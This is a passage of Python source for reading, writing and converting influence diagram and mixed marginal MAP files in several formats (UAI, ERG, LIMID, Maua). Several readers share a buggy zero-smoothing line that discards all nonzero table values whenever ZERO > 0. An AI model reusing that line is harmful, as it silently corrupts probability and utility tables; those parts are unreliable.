current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen))\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n if skip_table:\n for i in range(nfuncs):\n file_info['factors'].append(Factor(file_info['scopes'][i]))\n else:\n for i in range(nfuncs):\n num_rows = int(next(gen))\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in file_info['scopes'][i]) if len(file_info['scopes'][i]) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in file_info['scopes'][i]])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n return file_info\n\n\ndef write_standard_uai(file_name, file_info, file_type):\n uai_file = open(file_name, 'w')\n uai_file.write(\"{}\\n\".format(file_type))\n uai_file.write(\"{}\\n\".format(file_info['nvar']))\n uai_file.write(\"{}\\n\".format(\" \".join(str(el) for el in file_info['domains'])))\n uai_file.write(\"{}\\n\".format(len(file_info['scopes'])))\n for each_scope in file_info['scopes']:\n uai_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))]+[str(el) for el in each_scope])))\n uai_file.write(\"\\n\")\n for each_factor in file_info['factors']:\n uai_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n uai_file.close()\n\n\ndef write_vo_from_elim_order(file_name, elim_order, iw):\n vo_file_name = file_name if file_name.endswith(\".vo\") else file_name + \".vo\"\n vo_file = open(vo_file_name, 'w')\n vo_file.write(\"# iw={}\\n\".format(iw))\n vo_file.write((\"{}\\n\".format(len(elim_order))))\n for el in elim_order:\n vo_file.write(\"{}\\n\".format(el))\n vo_file.close()\n\n\ndef write_pvo_from_partial_elim_order(file_name, partial_variable_ordering):\n pvo_file = open(file_name, 'w')\n # partial variable ordering defines blocks of variables\n pvo_list = [el for el in partial_variable_ordering if len(el) > 0] # exclude zero length sub-list\n num_blocks = len(pvo_list)\n num_var = max(max(el) for el in pvo_list) + 1 # total var = largest var id + 1\n pvo_file.write(\"{};\\n\".format(num_var))\n pvo_file.write(\"{};\\n\".format(num_blocks))\n for block in pvo_list:\n pvo_file.write(\"{};\\n\".format(\" \".join((str(v) for v in block))))\n pvo_file.close()\n\n\ndef write_id_from_types(file_name, var_types, func_types):\n id_file = open(file_name, 'w')\n id_file.write(\"{}\\n\".format(len(var_types)))\n id_file.write(\"{}\\n\".format(\" \".join((el.upper() for el in var_types)))) # C, D\n id_file.write(\"{}\\n\".format(len(func_types)))\n id_file.write(\"{}\\n\".format(\" \".join((el.upper() for el in func_types)))) # P, U\n id_file.close()\n\n\ndef write_mi_from_types(file_name, var_types):\n mi_file = open(file_name, 'w')\n mi_file.write(\"{}\\n\".format(len(var_types)))\n mi_file.write(\"{}\\n\".format(\" \".join((el.upper() for el in var_types))))\n mi_file.close()\n\n\ndef write_map_from_types(file_name, var_types):\n map_file = open(file_name, 'w')\n dec_vars = [str(el) for el in range(len(var_types)) if var_types[el] == \"D\"]\n map_file.write(\"{}\\n\".format(len(dec_vars)))\n map_file.write(\"{}\\n\".format(\"\\n\".join(dec_vars)))\n map_file.close()\n\n\ndef write_map_from_list(file_name, map_vars):\n map_file = open(file_name, 'w')\n map_file.write(\"{}\\n\".format(len(map_vars)))\n map_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in map_vars)))\n map_file.close()\n\n########################################################################################################################\n# read influence diagram or related\ndef read_uai_id(file_name, sort_scope=True, skip_table=False):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name +\".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n id_file_name = file_name.replace(\".uai\", \".id\") if file_name.endswith(\".uai\") else file_name + \".id\"\n pt_file_name = file_name.replace(\".uai\", \".pt\") if file_name.endswith(\".uai\") else file_name + \".pt\"\n\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types': [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n blocks, num_blocks, nvars = read_pvo(pvo_file_name)\n nvars, var_types, nfuncs, func_types = read_id(id_file_name)\n pseudo_tree = read_pt(pt_file_name)\n\n file_info['nvar'] = nvars\n file_info['blocks'] = blocks\n file_info['var_types'] = var_types\n file_info['factor_types'] = func_types\n file_info['scope_types'] = func_types # scope and func types are the same because no decision appears\n nprob = len([el for el in var_types if el == 'C'])\n ndec = nvars - nprob\n nutil = nfuncs - nprob\n file_info['nprob'] = nprob\n file_info['ndec'] = ndec\n file_info['nutil'] = nutil\n file_info['pseudo_tree'] = pseudo_tree\n\n # gen = readFileByTokens(uai_file_name, '(),') # split on white space, (, ), and ,\n gen = get_a_token(uai_file_name)\n type = next(gen)\n assert int(next(gen)) == nvars, \"nvars error\"\n file_info['domains'] = [int(next(gen)) for _ in range(nvars)]\n assert len(file_info['domains']) == nvars, \"domains error\"\n assert int(next(gen)) == nfuncs, \"nfuncs error\"\n for _ in range(nfuncs):\n scope_size = int(next(gen))\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen))\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n\n if skip_table:\n for i in range(nfuncs):\n file_info['factors'].append(Factor(file_info['scopes'][i]))\n else:\n for i in range(nfuncs):\n num_rows = int(next(gen))\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in file_info['scopes'][i]) if len(file_info['scopes'][i]) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in file_info['scopes'][i]])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n return file_info\n\n\ndef read_erg(filename, sort_scope=True, skip_table=False):\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types': [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n # gen = readFileByTokens(filename, '(),') # split on white space, (, ), and ,\n gen = get_a_token(filename)\n type = next(gen)\n nvar = int(next(gen))\n file_info['nvar'] = nvar\n domains = []\n for i in range(nvar):\n domains.append(int(next(gen)))\n file_info['domains'] = domains\n var_type_dict = {}\n dec_vars = []\n for i in range(nvar):\n var_type_dict[i] = next(gen)\n if var_type_dict[i] in ['d', 'D']:\n dec_vars.append(i)\n file_info['var_types'].append('D' if var_type_dict[i]=='d' else 'C')\n file_info['ndec'] = len(dec_vars)\n file_info['nprob'] = nvar - file_info['ndec']\n temporal_order = []\n for i in range(nvar):\n temporal_order.append(int(next(gen)))\n nfactor = int(next(gen)) # sum of prob, dec, util\n file_info['nutil'] = nfactor - file_info['ndec'] - file_info['nprob']\n func_type_dict = {}\n for i in range(nfactor):\n func_type_dict[i] = next(gen) # p d u\n scope_size = int(next(gen)) # num vars in func\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen)) # get a var id\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n file_info['scope_types'].append(func_type_dict[i].upper())\n for i in range(len(file_info['scope_types'])): # read each table\n num_rows = int(next(gen)) # read num rows\n if num_rows == 0:\n continue\n else:\n # file_info['factors'].append(Factor(file_info['scopes'][i]))\n file_info['factor_types'].append(file_info['scope_types'][i])\n assert file_info['scope_types'][i] != 'D'\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n # current_table = []\n # for t in range(num_rows):\n # val = float(next(gen))\n # if val == 0:\n # val += ZERO\n # current_table.append(val)\n factor_size = tuple(v.states for v in file_info['scopes'][i]) if len(file_info['scopes'][i]) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in file_info['scopes'][i]])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n # from temporal ordering recover blocks; chance | dec | chance | dec | ... | hidden\n blocks = []\n current_block = []\n for i in temporal_order:\n if var_type_dict[i] in ['c', 'C']:\n current_block.append(i)\n else:\n if len(current_block): # first add obs\n blocks.append(current_block)\n current_block = []\n blocks.append([i]) # then add dec\n if len(current_block):\n blocks.append(current_block) # hidden chance vars\n file_info['blocks'] = list(reversed(blocks)) # return elim order; hidden vars -> dec -> obs\n file_info['nblock'] = len(blocks)\n return file_info\n\n\ndef read_limid(filename, sort_scope=True):\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types' : [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n # gen = readFileByTokens(filename, '(),') # split on white space, (, ), and ,\n gen = get_a_token(filename)\n type = next(gen)\n nvar = int(next(gen))\n file_info['nvar'] = nvar\n domains = []\n for i in range(nvar):\n domains.append(int(next(gen)))\n file_info['domains'] = domains\n file_info['nprob'] = int(next(gen))\n file_info['ndec'] = int(next(gen))\n file_info['nutil'] = int(next(gen))\n\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n scope_size = int(next(gen))\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen)) # get a var id\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n if i < file_info['nprob']:\n file_info['scope_types'].append('P')\n elif i < file_info['nprob'] + file_info['ndec']:\n file_info['scope_types'].append('D')\n else:\n file_info['scope_types'].append('U')\n\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n if file_info['nprob'] <= i < file_info['nprob'] + file_info['ndec']:\n continue # skip decision tables; not shown in the file\n else:\n num_rows = int(next(gen))\n current_scope = file_info['scopes'][i]\n file_info['factor_types'].append('P' if i < file_info['nprob'] else 'U')\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in current_scope) if len(current_scope) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in current_scope])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n\n blocks = []\n decision_vars = []\n observed_vars = set()\n for i in range(file_info['nprob'], file_info['nprob']+file_info['ndec']):\n current_scope = [v.label for v in file_info['scopes'][i]]\n blocks.append(current_scope[:-1]) # the last var label is for decision\n blocks.append([current_scope[-1]]) # put decision in a separate block\n decision_vars.append(current_scope[-1])\n observed_vars.update(current_scope[:-1])\n hidden_vars = []\n for el in range(file_info['nvar']):\n if el in decision_vars:\n file_info['var_types'].append('D')\n elif el in observed_vars:\n file_info['var_types'].append('C')\n else:\n file_info['var_types'].append('C')\n hidden_vars.append(el)\n if hidden_vars:\n blocks.append(hidden_vars)\n file_info['blocks'] = list(reversed(blocks)) # return elim order; hidden vars -> ..\n file_info['nblock'] = len(blocks)\n return file_info\n\ndef read_maua(filename, sort_scope=False):\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types' : [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n gen = get_a_token(filename)\n file_type = next(gen)\n if \"/*\" in file_type:\n while \"*/\" not in next(gen):\n pass\n file_type = next(gen)\n assert file_type == \"LIMID\"\n file_info['nprob'] = int(next(gen))\n file_info['ndec'] = int(next(gen))\n file_info['nutil'] =int(next(gen))\n file_info['nvar'] = file_info['nprob'] + file_info['ndec']\n # by conevnetion var from 0 to nprob-1 are chance vars and nprob to nvar-1 are decision vars\n file_info['domains'] = [int(next(gen)) for _ in range(file_info['nvar'])]\n # scopes are defined per each variable because ID is a DAG and 1 node can hold 1 function\n # maua's format only defines parents, different from UAI format https://github.com/denismaua/kpu-pp\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n num_pa = int(next(gen))\n if i < file_info['nprob'] + file_info['ndec']:\n current_scope = list(reversed([int(next(gen)) for _ in range(num_pa)])) + [i]\n else:\n current_scope = list(reversed([int(next(gen)) for _ in range(num_pa)]))\n current_scope = [Var(v, file_info['domains'][v]) for v in current_scope]\n file_info['scopes'].append(current_scope)\n if i < file_info['nprob']:\n file_info['scope_types'].append('P')\n elif i < file_info['nprob'] + file_info['ndec']:\n file_info['scope_types'].append('D')\n else:\n file_info['scope_types'].append('U')\n # read tables\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n if file_info['nprob'] <= i < file_info['nprob'] + file_info['ndec']:\n continue # skip decision tables; not shown in the file\n else:\n num_rows = int(next(gen))\n current_scope = file_info['scopes'][i]\n file_info['factor_types'].append('P' if i < file_info['nprob'] else 'U')\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in current_scope) if len(current_scope) else (1,)\n try:\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n except:\n print(\"err\")\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in current_scope])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n # read partial variable ordering from decision scopes assuming decisions follow temporal order\n blocks = []\n decision_vars = []\n observed_vars = set()\n for i in range(file_info['nprob'], file_info['nprob']+file_info['ndec']):\n current_scope = [v.label for v in file_info['scopes'][i]]\n blocks.append(current_scope[:-1]) # the last var label is for decision\n blocks.append([current_scope[-1]]) # put decision in a separate block\n decision_vars.append(current_scope[-1])\n observed_vars.update(current_scope[:-1])\n hidden_vars = []\n for el in range(file_info['nvar']):\n if el in decision_vars:\n file_info['var_types'].append('D')\n elif el in observed_vars:\n file_info['var_types'].append('C')\n else:\n file_info['var_types'].append('C')\n hidden_vars.append(el)\n if hidden_vars:\n blocks.append(hidden_vars)\n file_info['blocks'] = list(reversed(blocks)) # return elim order, so starting from hidden vars -> ..\n file_info['nblock'] = len(blocks)\n return file_info\n\n\ndef read_uai_bn(filename):\n # read a BN and return a dict of dict\n # { var_id:\n # {domain_size, parent_vars, scope_vars, table_length, table}\n # }\n # BN uai file assumes that functions are shown in the order of variable labels and\n # the last variable of a scope is the head\n bn_lines = get_a_line(filename)\n bn_dict = {}\n print(\"reading uai file type of {}\".format(next(bn_lines)))\n num_vars = int(next(bn_lines))\n for ind, k in enumerate(next(bn_lines).split()):\n bn_dict[ind] = {}\n bn_dict[ind]['domain_size'] = int(k)\n assert len(bn_dict) == num_vars, \"num vars error\"\n num_funcs = int(next(bn_lines))\n ### encode scope\n for ind in range(num_funcs):\n scope = [int(v) for v in next(bn_lines).split()] # the first element is the scope size\n var_id = scope[-1]\n assert ind == var_id, \"bn assumes the n-th function is defined by the n-th variable\"\n assert scope[0] == (len(scope)-1), \"scope size error\"\n bn_dict[var_id]['parents'] = scope[1:-1] # parent variables\n bn_dict[var_id]['scope'] = scope[1:] # include self, scope shown in the file\n assert len(bn_dict[var_id]['scope']) > 0, \"scope must be greater than 0\"\n bn_dict[var_id]['table_length'] = 1\n for v in bn_dict[var_id]['scope']:\n bn_dict[var_id]['table_length'] *= bn_dict[v]['domain_size']\n ### store tables as a list\n for var_id in range(num_funcs):\n table_length = int(next(bn_lines))\n assert table_length == bn_dict[var_id]['table_length'], \"table length error\"\n cpt_values = []\n while len(cpt_values) < table_length:\n cpt_values.extend([float(val) for val in next(bn_lines).split()])\n bn_dict[var_id]['table'] = cpt_values\n return bn_dict\n\n\n########################################################################################################################\n# read pure mmap or mixed mmap\ndef read_uai_mmap(file_name, sort_scope=True):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n map_file_name = file_name if file_name.endswith(\".map\") else file_name + \".map\"\n\n file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0,\n 'scopes': [], 'scope_types': [],\n 'factors': [], 'factor_types': [],\n 'blocks': [], 'var_types': []}\n\n uai_info = read_standard_uai(uai_file_name, sort_scope)\n map_vars = read_map(map_file_name)\n\n file_info['nvar'] = len(uai_info['domains'])\n file_info['domains'] = uai_info['domains']\n file_info['ndec'] = len(map_vars)\n file_info['nprob'] = file_info['nvar'] - file_info['ndec']\n file_info['scopes'] = uai_info['scopes'] # list of Vars\n file_info['scope_types'] = ['P']* len(file_info['scopes'])\n file_info['factors'] = uai_info['factors'] # list of factors\n file_info['factor_types'] = file_info['scope_types']\n file_info['blocks'] = [[el for el in range(file_info['nvar']) if el not in map_vars], map_vars]\n file_info['var_types'] = ['D' if el in map_vars else 'C' for el in range(file_info['nvar'])]\n\n return file_info\n\n\ndef read_uai_mixed(file_name, sort_scope=True, skip_table=False):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n mi_file_name = file_name.replace(\".uai\", \".mi\") if file_name.endswith(\".uai\") else file_name + \".mi\"\n\n file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0,\n 'scopes': [], 'scope_types': [], 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n\n uai_info = read_standard_uai(uai_file_name, sort_scope, skip_table)\n blocks, nblocks, nvars = read_pvo(pvo_file_name)\n num_vars, var_types = read_mi(mi_file_name)\n dec_vars = [el for el in range(num_vars) if var_types[el] == 'D']\n\n file_info['nvar'] = nvars\n file_info['domains'] = uai_info['domains']\n file_info['ndec'] = len(dec_vars)\n file_info['nprob'] = nvars - file_info['ndec']\n file_info['scopes'] = uai_info['scopes']\n file_info['scope_types'] = ['P'] * len(file_info['scopes'])\n file_info['factor_types'] = file_info['scope_types']\n file_info['factors'] = uai_info['factors'] # list of factors\n file_info['blocks'] = blocks\n file_info['var_types'] = var_types\n\n return file_info\n\n\n########################################################################################################################\n# translate influence diagram to pure mmap or mixed mmap\ndef translate_uai_id_to_mixed(id_file_info):\n mmap_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n\n mmap_file_info['nvar'] = id_file_info['nvar'] + 1\n mmap_file_info['domains'] = id_file_info['domains'] + [id_file_info['nutil']] # append 1 latent var\n mmap_file_info['nprob'] = id_file_info['nprob'] + 1\n mmap_file_info['ndec'] = id_file_info['ndec']\n latent_var_id = mmap_file_info['nvar'] - 1\n latent_var = Var(latent_var_id, id_file_info['nutil'])\n for scope_ind, scope in enumerate(id_file_info['scopes']):\n if id_file_info['scope_types'][scope_ind] == 'U':\n mmap_file_info['scopes'].append([latent_var] + scope) # prepend latent var\n else:\n mmap_file_info['scopes'].append(scope)\n mmap_file_info['scope_types'] = 'P'\n mmap_file_info['factor_types'] = 'P'\n mmap_file_info['var_types'] = id_file_info['var_types'] + ['C'] # the last latent variable is Chance/sum\n\n dec_vars = [i for i in range(id_file_info['nvar']) if id_file_info['var_types'][i] == 'D']\n if id_file_info['blocks'][0][0] in dec_vars:\n mmap_file_info['blocks'] = [[latent_var_id]] + [el for el in id_file_info['blocks']]\n else:\n mmap_file_info['blocks'] = [[latent_var_id]+id_file_info['blocks'][0]] + [el for el in id_file_info['blocks'][1:]]\n\n util_factor_count = 0\n for factor_ind, factor in enumerate(id_file_info['factors']):\n if id_file_info['factor_types'][factor_ind] == 'U':\n mmap_scope = mmap_file_info['scopes'][factor_ind] # scopes and factors follow same index\n mmap_factor_dim = tuple(v.states for v in mmap_scope) if len(mmap_scope) else (1,)\n util_factor_table = factor.t\n assert util_factor_table.shape == mmap_factor_dim[1:] # the first dim associated with the latent var\n assert mmap_factor_dim[0] == id_file_info['nutil']\n mmap_factor_table = np.ones(mmap_factor_dim, dtype=float, order='C')\n mmap_factor_table[util_factor_count] = util_factor_table\n util_factor_count += 1\n mmap_factor = Factor(mmap_scope)\n mmap_factor.t = mmap_factor_table\n mmap_file_info['factors'].append(mmap_factor)\n else:\n mmap_file_info['factors'].append(factor) # append the same factor\n return mmap_file_info\n\n\n# def translate_id_to_mmap(id_file_info):\n# mmap_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n# 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n# raise NotImplementedError\n# return mmap_file_info\n#\n#\n# def translate_mmap_to_id(mmap_file_info):\n# id_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n# 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n# raise NotImplementedError\n# return id_file_info\n#\n#\n# def translate_mixed_to_id(mmap_file_info):\n# id_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n# 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n# raise NotImplementedError\n# return id_file_info\n\n\n########################################################################################################################\n# wrtie influence diagrams from file_info\ndef write_uai_id_from_info(file_name, file_info):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name +\".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n id_file_name = file_name.replace(\".uai\", \".id\") if file_name.endswith(\".uai\") else file_name + \".id\"\n uai_file = open(uai_file_name, 'w')\n uai_file.write(\"ID\\n\")\n uai_file.write(\"{}\\n\".format(file_info['nvar']))\n uai_file.write(\"{}\\n\".format(' '.join((str(el) for el in file_info['domains']))))\n uai_file.write(\"{}\\n\".format(file_info['nprob']+file_info['nutil']))\n for scope_ind, each_scope in enumerate(file_info['scopes']): # exclude decisions scope;\n if file_info['scope_types'][scope_ind] != 'D': # skip decision scopes in uai file\n uai_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))]+[str(el) for el in each_scope])))\n uai_file.write(\"\\n\")\n for each_factor in file_info['factors']: # scopes and factors follow the same order after removing decisions\n uai_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n uai_file.close()\n write_pvo_from_partial_elim_order(pvo_file_name, file_info['blocks'])\n write_id_from_types(id_file_name, file_info['var_types'], file_info['factor_types'])\n\n\ndef write_limid_from_info(file_name, file_info):\n limid_file_name = file_name if file_name.endswith(\".limid\") else file_name + \".limid\"\n limid_file = open(limid_file_name, 'w')\n limid_file.write(\"LIMID\\n\")\n limid_file.write(\"{}\\n\".format(file_info['nvar']))\n limid_file.write(\"{}\\n\".format(' '.join([str(el) for el in file_info['domains']])))\n limid_file.write(\"{}\\n\".format(file_info['nprob']))\n limid_file.write(\"{}\\n\".format(file_info['ndec']))\n limid_file.write(\"{}\\n\".format(file_info['nutil']))\n\n for scope_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['scope_types'][scope_ind] == 'P':\n limid_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n previous_block = []\n decision_temporal_order = []\n for each_block in reversed(file_info['blocks']):\n if len(each_block) == 1 and file_info['var_types'][each_block[0]] == 'D':\n decision_scope = previous_block + each_block # [ parents ] + [ decision ]\n decision_temporal_order.append(each_block[0])\n limid_file.write(\"{}\\n\".format(' '.join([str(len(decision_scope))] + [str(el) for el in decision_scope])))\n previous_block = each_block\n for scope_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['scope_types'][scope_ind] == 'U':\n limid_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n limid_file.write(\"\\n\")\n\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'P':\n limid_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'U':\n limid_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n limid_file.close()\n\n\ndef write_erg_from_info(file_name, vo_file, file_info):\n erg_file_name = file_name if file_name.endswith(\".erg\") else file_name + \".erg\"\n erg_file = open(erg_file_name, 'w')\n erg_file.write(\"ID\\n\")\n erg_file.write(\"{}\\n\".format(file_info['nvar']))\n erg_file.write(\"{}\\n\".format(' '.join((str(el) for el in file_info['domains']))))\n erg_file.write(\"{}\\n\".format(' '.join((el.lower() for el in file_info['var_types']))))\n ### erg file shows a temporal ordering (reverse of the elimination ordering in vo_file)\n elim_order, iw = read_vo(vo_file)\n erg_file.write(\"{}\\n\".format(' '.join((str(el) for el in reversed(elim_order)))))\n erg_file.write(\"{}\\n\".format(file_info['nprob']+file_info['ndec']+file_info['nutil']))\n\n ### write probability, decision, utility scopes\n for f_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['factor_types'][f_ind] == 'P':\n erg_file.write(\"p {}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n ### decision scopes\n previous_block = []\n for each_block in reversed(file_info['blocks']):\n if len(each_block) == 1 and file_info['var_types'][each_block[0]] == 'D':\n decision_scope = previous_block + each_block # [ parents ] + [ decision ]\n erg_file.write(\"d {}\\n\".format(' '.join([str(len(decision_scope))] + [str(el) for el in decision_scope])))\n previous_block = each_block\n for f_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['factor_types'][f_ind] == 'U':\n erg_file.write(\"u {}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n erg_file.write(\"\\n\")\n\n ### write probability, decision, utility tables\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'P':\n erg_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n for _ in range(file_info['ndec']):\n erg_file.write(\"0\\n\")\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'U':\n erg_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n erg_file.close()\n\n\n########################################################################################################################\n# write pure mmap or mixed mmap from file_info\ndef write_uai_mmap(file_name, file_info, uai_type=\"MARKOV\"):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name +\".uai\"\n map_file_name = file_name.replace(\".uai\", \".map\") if file_name.endswith(\".uai\") else file_name + \".map\"\n\n write_standard_uai(uai_file_name, file_info, uai_type)\n write_map_from_types(map_file_name, file_info['var_types'])\n\n\ndef write_uai_mixed(file_name, file_info, uai_type=\"MARKOV\"):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n mi_file_name = file_name.replace(\".uai\", \".mi\") if file_name.endswith(\".uai\") else file_name + \".mi\"\n write_standard_uai(uai_file_name, file_info, uai_type)\n write_pvo_from_partial_elim_order(pvo_file_name, file_info['blocks'])\n write_mi_from_types(mi_file_name, file_info['var_types'])\n\n########################################################################################################################\n# convert formats\ndef convert_uai_id_to_mixed(uai_file_name, mixed_file_name):\n id_file_info = read_uai_id(uai_file_name, sort_scope=False)\n mmap_file_info = translate_uai_id_to_mixed(id_file_info)\n write_uai_mixed(mixed_file_name, mmap_file_info)\n\n\ndef convert_mmap_to_mixed(mmap_file_name, mixed_file_name):\n file_info = read_uai_mmap(mmap_file_name, sort_scope=False)\n write_uai_mixed(mixed_file_name, file_info)\n\n\ndef convert_uai_to_limid(uai_file_name, limid_file_name):\n file_info = read_uai_id(uai_file_name, sort_scope=False)\n write_limid_from_info(limid_file_name, file_info)\n\n\ndef convert_uai_to_erg(uai_file_name, vo_file, erg_file_name):\n file_info = read_uai_id(uai_file_name, sort_scope=False)\n write_erg_from_info(erg_file_name, vo_file, file_info)\n\n\ndef convert_erg_to_uai(erg_file_name, uai_file_name):\n file_info = read_erg(erg_file_name, sort_scope=False)\n write_uai_id_from_info(uai_file_name, file_info)\n\n\ndef convert_erg_to_limid(erg_file_name, limid_file_name):\n file_info = read_erg(erg_file_name, sort_scope=False)\n write_limid_from_info(limid_file_name, file_info)\n\n\ndef convert_limid_to_uai(limid_file_name, uai_file_name):\n file_info = read_limid(limid_file_name, sort_scope=False)\n write_uai_id_from_info(uai_file_name, file_info)\n\n\ndef convert_limid_to_erg(limid_file_name, vo_file, erg_file_name):\n raise NotImplementedError # detour uai_id\n\n\ndef convert_maua_to_uai(maua_file_name, uai_file_name):\n file_info = read_maua(maua_file_name, sort_scope=False)\n write_uai_id_from_info(uai_file_name, file_info)\n\n\n########################################################################################################################\n# write influce diagrams from nx 